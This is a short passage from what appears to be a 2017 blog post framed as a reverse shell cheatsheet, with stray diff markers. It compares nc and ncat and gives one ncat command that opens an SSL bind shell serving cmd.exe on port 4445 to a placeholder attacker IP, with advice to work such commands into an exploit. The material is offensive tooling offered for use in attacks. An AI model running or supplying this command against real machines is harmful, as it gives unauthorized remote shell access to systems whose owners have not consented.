remotephone/blog.rmtph.one/_posts/2017-01-17-reverse-shell-cheatsheet.md

 Ncat and nc are great tools.
 You can do a ton with each one, but ncat is just a whole other level for what it allows you to accomplish.
 While nc is the traditional tool, ncat comes from the same people who produce nmap and includes tons more features including ssl support and the ability to restrict access!

+Of course, you'll have to work these into your exploit.
 To create a bind shell that only allows a specific IP to connect to it, use

 ~~~
 ncat -lvp 4445 -e cmd.exe --allow <ATTACKIP> --ssl